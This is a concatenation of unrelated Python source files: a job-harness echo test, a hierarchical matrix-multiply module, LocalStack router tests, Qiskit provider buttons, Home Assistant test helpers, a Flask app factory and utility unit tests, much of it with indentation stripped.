for i in range(0,7):
print("creating process " + str(i))
linux_harn.add_proc(Linharn_proc.wrap_loop)
linux_harn.procs[i].start()
echo = brain.queries.get_plugin_command("Harness", "echo", brain.connect())
echo_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": echo
}
for i in range(0,25):
echo_job["JobCommand"]["Inputs"][0]["Value"] = "Hello World" + str(i)
job_list.append(deepcopy(echo_job))
inserted = brain.queries.insert_jobs(job_list, True, brain.connect())
NOW = time()
while time() - NOW < 120:
if brain.rethinkdb.db("Brain").table("Jobs").filter((brain.rethinkdb.row["Status"] == "Waiting") |
(brain.rethinkdb.row["Status"] == "Ready") |
(brain.rethinkdb.row["Status"] == "Pending") |
(brain.rethinkdb.row["Status"] == "Active")).is_empty().run(brain.connect()):
break
sleep(16)
for i in inserted["generated_keys"]:
print(brain.queries.get_job_by_id(i, brain.connect()))
print(time())
assert brain.queries.is_job_done(i, brain.connect())
assert brain.queries.get_output_content(i, conn=brain.connect())
|
fast_multiplier_utils.py
|
import tools
from multiprocessing import SimpleQueue, Process
import numpy as np
__all__ = ['fast_multiply']
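# Note: the helpers below appear to implement a hierarchical (HSS-style)
# matrix-vector product over a binary tree of nodes (an interpretation, not
# documented in this module):
#   get_b  slices the input vector to a leaf node's index range,
#   get_G  accumulates V^T * b at the leaves and W^T-compressed sums up the tree,
#   get_F  propagates cross-block contributions back down via the R and B blocks,
#   func   combines the diagonal block D*b with the low-rank correction U*F.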
def get_b(i, level_to_nodes, max_level, b):
indices = level_to_nodes[max_level][i].Indices
start, end = indices[0], indices[-1]
res = b[start:end + 1]
return res
def get_G(k, i, level_to_nodes, max_level, b):
if k == max_level:
res = tools.matmul(np.transpose(level_to_nodes[k][i].V), get_b(i, level_to_nodes, max_level, b))
else:
t = tools.matmul(np.transpose(level_to_nodes[k][i].Ws[0]), get_G(k + 1, 2*i, level_to_nodes, max_level, b))
s = tools.matmul(np.transpose(level_to_nodes[k][i].Ws[1]), get_G(k + 1, 2*i + 1, level_to_nodes, max_level, b))
res = t + s
return res
def get_F(k, i, level_to_nodes, max_level, A, b):
if k == 1 and i == 0:
res = [0] * level_to_nodes[k][0].Rs[0].shape[1]
elif i % 2 == 0:
res = tools.matmul(level_to_nodes[k][i].get_B_subblock(A), get_G(k, i + 1, level_to_nodes, max_level, b)) + \
tools.matmul(level_to_nodes[k - 1][i // 2].Rs[0], get_F(k - 1, i // 2, level_to_nodes, max_level, A, b))
else:
res = tools.matmul(level_to_nodes[k][i].get_B_subblock(A), get_G(k, i - 1, level_to_nodes, max_level, b)) + \
tools.matmul(level_to_nodes[k - 1][i // 2].Rs[1], get_F(k - 1, i // 2, level_to_nodes, max_level, A, b))
return res
def func(i, b, level_to_nodes, max_level, A, q):
s1 = level_to_nodes[max_level][i].get_D(A)
s2 = np.array(get_b(i, level_to_nodes, max_level, b))
s3 = level_to_nodes[max_level][i].U
s4 = get_F(max_level, i, level_to_nodes, max_level, A, b)
res = tools.matmul(s1, s2) + tools.matmul(s3, s4)
q.put((i, res))
return res
def batch_func(args):
for arg in args:
func(*arg)
def fast_multiply(partition, A, b, processes_count=4):
if partition.max_level == 1:
return tools.matmul(partition.level_to_nodes[partition.max_level][0].get_D(A), b)
res = {}
queue = SimpleQueue()
args = {}
tasks_count = len(partition.level_to_nodes[partition.max_level])
for k in range(0, tasks_count):
index = k % processes_count
args[index] = args.get(index, []) + [(k, b, partition.level_to_nodes, partition.max_level, A, queue)]
processes = []
for key in args.keys():
p = Process(target=batch_func, args=(args[key],))
        p.daemon = True
p.start()
processes.append(p)
for _ in range(tasks_count):
pair = queue.get()
res[pair[0]] = pair[1]
result = []
for k in range(0, tasks_count):
result += list(res[k])
return np.array(result)
|
test_router.py
|
import threading
from typing import List, Tuple
import pytest
import requests
import werkzeug
from werkzeug.exceptions import NotFound
from localstack.http import Request, Response, Router
from localstack.http.router import E, RequestArguments
from localstack.utils.common import get_free_tcp_port
def noop(*args, **kwargs):
"""Test dispatcher that does nothing"""
return Response()
class RequestCollector:
"""Test dispatcher that collects requests into a list"""
requests: List[Tuple[Request, E, RequestArguments]]
def __init__(self) -> None:
super().__init__()
self.requests = []
def __call__(self, request: Request, endpoint: E, args: RequestArguments) -> Response:
self.requests.append((request, endpoint, args))
return Response()
class TestRouter:
    # these are sanity checks for the router and dispatching logic. since the matching is done by werkzeug's Map,
    # there is no need to test URL matching thoroughly here.
def test_dispatch_raises_not_found(self):
router = Router()
router.add("/foobar", noop)
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/foo"))
def test_default_dispatcher_invokes_correct_endpoint(self):
router = Router()
def index(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
def users(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
router.add("/", index)
router.add("/users/<int:user_id>", users)
assert router.dispatch(Request("GET", "/")).json == {}
assert router.dispatch(Request("GET", "/users/12")).json == {"user_id": 12}
def test_dispatch_with_host_matching(self):
router = Router()
def ep_all(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="all", **args))
return response
def ep_index1(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="1", **args))
return response
def ep_index2(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="2", **args))
return response
router.add("/", ep_index1, host="localhost:<port>")
router.add("/", ep_index2, host="localhost:12345")
router.add("/all", ep_all, host="<host>")
def invoke(path, server, port):
return router.dispatch(Request("GET", path, server=(server, port))).json
assert invoke("/", "localhost", 4566) == {"method": "1", "port": "4566"}
assert invoke("/", "localhost", 12345) == {"method": "2"}
assert invoke("/all", "127.0.0.1", None) == {"method": "all", "host": "127.0.0.1"}
assert invoke("/all", "127.0.0.1", 12345) == {"method": "all", "host": "127.0.0.1:12345"}
with pytest.raises(NotFound):
invoke("/", "localstack.cloud", None)
def test_custom_dispatcher(self):
collector = RequestCollector()
router = Router(dispatcher=collector)
router.add("/", "index")
router.add("/users/<int:id>", "users")
router.dispatch(Request("GET", "/"))
router.dispatch(Request("GET", "/users/12"))
_, endpoint, args = collector.requests[0]
assert endpoint == "index"
assert args == {}
_, endpoint, args = collector.requests[1]
assert endpoint == "users"
assert args == {"id": 12}
def test_remove_rule(self):
router = Router()
def index(_: Request, args) -> Response:
return Response(b"index")
def users(_: Request, args) -> Response:
return Response(b"users")
rule0 = router.add("/", index)
rule1 = router.add("/users/<int:user_id>", users)
assert router.dispatch(Request("GET", "/")).data == b"index"
assert router.dispatch(Request("GET", "/users/12")).data == b"users"
router.remove_rule(rule1)
assert router.dispatch(Request("GET", "/")).data == b"index"
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/users/12"))
router.remove_rule(rule0)
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/"))
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/users/12"))
class TestWsgiIntegration:
def test_with_werkzeug(self):
        # set up the router
router = Router()
def index(_: Request, args) -> Response:
return Response(b"index")
def echo_json(request: Request, args) -> Response:
response = Response()
response.set_json(request.json)
return response
def users(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
router.add("/", index)
router.add("/users/<int:user_id>", users, host="<host>:<port>")
router.add("/echo/", echo_json, methods=["POST"])
# serve router through werkzeug
@werkzeug.Request.application
def app(request: werkzeug.Request) -> werkzeug.Response:
return router.dispatch(request)
host = "localhost"
port = get_free_tcp_port()
url = f"http://{host}:{port}"
server = werkzeug.serving.make_server(host, port, app=app, threaded=True)
t = threading.Thread(target=server.serve_forever)
t.start()
try:
resp = requests.get(f"{url}/")
assert resp.ok
assert resp.content == b"index"
resp = requests.get(f"{url}/users/123")
assert resp.ok
assert resp.json() == {"user_id": 123, "host": host, "port": str(port)}
resp = requests.get(f"{url}/users")
assert not resp.ok
resp = requests.post(f"{url}/echo", json={"foo": "bar", "a": 420})
assert resp.ok
assert resp.json() == {"foo": "bar", "a": 420}
finally:
server.shutdown()
t.join(timeout=10)
|
provider_buttons.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import time
import threading
import pyperclip
import ipyvuetify as vue
import ipywidgets as wid
def _copy_text_thread(button):
""" A function that signals button text was copied to clipboard
"""
old_text = button.children[0]
hub, group, project = old_text.split('/')
pyperclip.copy("IBMQ.get_provider(hub='{hub}', group='{group}', project='{project}')" \
.format(hub=hub, group=group, project=project))
button.children = ['Copied to clipboard.']
time.sleep(1)
button.children = [old_text]
def _copy_text(*args):
thread = threading.Thread(target=_copy_text_thread, args=(args[0],))
thread.start()
def provider_buttons(providers):
""" Generates a collection of provider buttons for a backend.
Parameters:
providers (list): A list of providers.
Returns:
VBox: An ipywidgets VBox instance.
"""
vbox_buttons = []
for pro in providers:
button = wid.Box(children=[vue.Btn(color='#f5f5f5', small=True,
children=[pro],
style_="font-family: Arial, sans-serif; font-size:10px;")],
layout=wid.Layout(margin="0px 0px 2px 0px",
width='350px'))
button.children[0].on_event('click', _copy_text)
vbox_buttons.append(button)
return wid.VBox(children=vbox_buttons,
layout=wid.Layout(width='350px',
max_width='350px'))
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, data_entry_flow, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id='mock-id', is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
super().__init__(
id=id, is_owner=is_owner, is_active=is_active, name=name,
system_generated=system_generated)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Helper to register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=data_entry_flow.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count; optional, as it can usually be
      determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
|
__init__.py
|
from threading import Thread
from flask import Flask
from flask import request
from flask_babel import Babel
from flask_redis import FlaskRedis
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
babel = Babel()
redis = FlaskRedis()
db = SQLAlchemy()
migrate = Migrate()
def create_app():
app = Flask(__name__)
# load config
from . import config
app.config.from_object(config)
# blueprint init
from . import views
for view in views.__all__:
app.register_blueprint(getattr(views, view).__getattribute__("bp"))
# template filter init
from . import template_filter
for name in template_filter.filter_list:
app.add_template_filter(f=getattr(template_filter, name), name=name)
# i18n
babel.init_app(app=app)
@babel.localeselector
def get_locale():
return app.config['LANGUAGE_MAP'][request.accept_languages.best_match(app.config['LANGUAGE_MAP'].keys())]
# client init
redis.init_app(app=app)
db.init_app(app=app)
migrate.init_app(app=app, db=db)
# background task
from . import task
Thread(target=task.core, args=(app,), daemon=True).start()
return app
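# A minimal usage sketch of the factory (hypothetical entry point, not part of
# this package):
#   from <package> import create_app
#   app = create_app()
#   app.run()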
|
test_util.py
|
#
# test_util
#
# Copyright (c) 2011-2021 Akinori Hattori <hattya@gmail.com>
#
# SPDX-License-Identifier: MIT
#
import collections.abc
import os
import pickle
import random
import threading
import time
from ayame import util
from base import AyameTestCase
class UtilTestCase(AyameTestCase):
def test_fqon_of_builtin(self):
self.assertEqual(util.fqon_of(None), 'NoneType')
self.assertEqual(util.fqon_of(True), 'bool')
self.assertEqual(util.fqon_of(False), 'bool')
self.assertEqual(util.fqon_of(''), 'str')
self.assertEqual(util.fqon_of([]), 'list')
self.assertEqual(util.fqon_of({}), 'dict')
self.assertEqual(util.fqon_of(1), 'int')
self.assertEqual(util.fqon_of(3.14), 'float')
def test_fqon_of_class(self):
class C:
pass
self.assertEqual(util.fqon_of(C), __name__ + '.C')
self.assertEqual(util.fqon_of(C()), __name__ + '.C')
C.__module__ = None
self.assertEqual(util.fqon_of(C), '<unknown>.C')
self.assertEqual(util.fqon_of(C()), '<unknown>.C')
def test_fqon_of_function(self):
def f():
pass
self.assertEqual(util.fqon_of(f), __name__ + '.f')
del f.__module__
self.assertEqual(util.fqon_of(f), '<unknown>.f')
f = lambda: None
self.assertEqual(util.fqon_of(f), __name__ + '.<lambda>')
del f.__module__
self.assertEqual(util.fqon_of(f), '<unknown>.<lambda>')
def test_fqon_of_module(self):
self.assertEqual(util.fqon_of(os), 'os')
self.assertEqual(util.fqon_of(util), 'ayame.util')
def test_to_bytes(self):
# iroha in hiragana
v = util.to_bytes('\u3044\u308d\u306f')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'\xe3\x81\x84\xe3\x82\x8d\xe3\x81\xaf')
v = util.to_bytes('\u3044\u308d\u306f', 'ascii', 'ignore')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'')
with self.assertRaises(UnicodeEncodeError):
util.to_bytes('\u3044\u308d\u306f', 'ascii')
v = util.to_bytes(b'abc')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'abc')
v = util.to_bytes(0)
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'0')
v = util.to_bytes(3.14)
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'3.14')
def test_to_list(self):
self.assertEqual(util.to_list(None), [])
self.assertEqual(util.to_list('abc'), ['abc'])
self.assertEqual(util.to_list(''), [''])
self.assertEqual(util.to_list(1), [1])
self.assertEqual(util.to_list(3.14), [3.14])
self.assertEqual(util.to_list((1,)), [1])
self.assertEqual(util.to_list([1]), [1])
